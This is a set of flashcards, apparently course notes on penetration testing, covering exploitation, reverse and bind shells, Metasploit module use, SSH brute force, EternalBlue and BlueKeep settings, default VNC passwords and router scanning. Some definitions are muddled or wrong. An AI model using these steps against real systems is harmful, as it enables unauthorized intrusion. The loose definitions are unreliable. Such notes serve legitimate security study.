Hacking - Section 8 - Exploitation and Gaining Access. Flashcards
What is exploitation?
It is using the vulnerabilities found to send a payload (a program) to the target.
What does the payload allow you to do?
Write commands directly into the target machine.
What happens if the target doesn’t have any vulnerabilities?
You need to make them open a payload by themselves, by using emails, files, etc.
What is a vulnerability?
It can be when the code of a piece of software was not well written, which can be exploited through the use of a bug in order to make it function differently (payload).
What is a CVE and a zero-day vulnerability?
CVE + a year / when it first occurred is a bug-exploited vulnerability.
Zero-day is a vulnerability that has not been patched yet (not discovered).
What is a shell?
Explain its two types:
shell = payload
reverse shell - the target machine tries to connect back to Kali Linux: exploit the target and drop a shell, which will tell the target machine to connect to our port.
bind shell - the target machine opens a port for us to connect to, but this almost never works because firewalls can forbid target machines from opening ports.
How to open the Metasploit framework list?
cd /usr/share/metasploit-framework/
How to open a Metasploit framework file to see its code?
nano + name of it
(in the directory where they are)
How to open the msfconsole?
msfconsole
How to show any section inside the msfconsole?
show + section you want
How to show a section inside msfconsole?
type: show + name of the section
ex - show payloads
How to use a module?
use + section name + name of it
ex - use exploit/ + name you’ve copied
After using a module, how can you know more about it?
show info
show options
Inside the ‘show options’ command, if you want to change any info you can type:
set + name of option + new info
ex - set LHOST 192.168.7
Inside the ‘module’, to show the payloads that will work for that command you can type:
And how to set a new payload?
show payloads
copy the one you desire (show payloads) and type:
set payload + its name
show options
How to show the available targets inside the module?
and how to set one?
show targets
set target + number (then use exploit)
How can you use a version found in searchsploit on the msfconsole?
If you find a path result with metasploit in it, you can use:
search + name of the version (on the msfconsole)
How to exit the shell?
exit
What is the ‘netcat’ tool and how to use it?
A tool that allows us to establish a connection with other machines using TCP/UDP.
nc -h
nc + IP + Port Nº
What are some rare exploits that barely happen but are guaranteed to exploit?
Bindshell and Telnet.
How to exploit telnet?
telnet + IP
How to run the commands on the msfconsole?
run
How to search for a version of an exploit?
searchsploit + its name
msfconsole
use + the name you saw + /port that you desire
use + same thing as above + /the version you choose from msfconsole
run
ex - use auxiliary/scanner/smb/
use auxiliary/scanner/smb/ + /version u desire
set RHOSTS
run
What is a brute force attack?
Is to send information (usernames and passwords) to the target to check if any of those are correct.
Why is the brute force attack used?
To check if the target has default credentials or weak passwords (or both).
How to access ssh modules (msfconsole)?
search ssh
How to set a password/username file to use in a brute force attack?
nano PASSWORDS.txt (write passwords inside of it)
nano USERNAMES.txt (write usernames inside of it)
(go to the desktop and type pwd to get its path)
set PASS_FILE + output of pwd + /PASSWORDS.txt
set USER_FILE + output of pwd + /USERNAMES.txt
set VERBOSE TRUE
set RHOSTS + IP
What does the command ‘sessions’ do?
And how to open (start) a connection with one?
It will show you all the shells that you are connected to.
sessions -i + Nº of it
What does the -p- option in nmap mean?
It means it will scan all ports on the machine.
ex - sudo nmap -sV + IP + -p-
How to connect to a VNC port?
vncviewer + IP
password = password
What is port 445 on Windows?
A port that is always open, mainly in companies, because it is used to share files and data between the company’s computers.
What does the ‘getuid’ command stand for on Windows?
It will tell you the ‘account’ that you are positioned in.
NT AUTHORITY\SYSTEM is the highest one.
How to show all files, including hidden directories, with the ls command?
ls -la
How to execute the eternalblue_doublepulsar on msfconsole?
use windows/smb/eternalblue_doublepulsar
processinject - lsass.exe (for 64-bit machines)
RHOSTS - target IP
targetarchitecture - x64 (for 64-bit machines)
payload - (windows/x64/meterpreter/reverse_tcp)
What is an RCE?
Remote code execution,
meaning that the attacker does not have to authenticate in order to write code on the machine.
What is the port that is frequently open in big companies but not on home devices?
port 3389
What can you do to check if a target is vulnerable?
You can use an auxiliary module of the specific vulnerability that you intend to deploy.
How to use the bluekeep exploit?
search bluekeep
use it
set RHOSTS (needs port 3389 open)
What happens if you break into a router?
You’ll get access to the whole network.
Why are routers the easiest devices to hack?
Because most of them (home routers) have default login passwords.
How to open the ‘routersploit’ command?
rsf.py
What does the /autopwn scan do?
It scans the router for several vulnerabilities and sees if any of them are exploitable.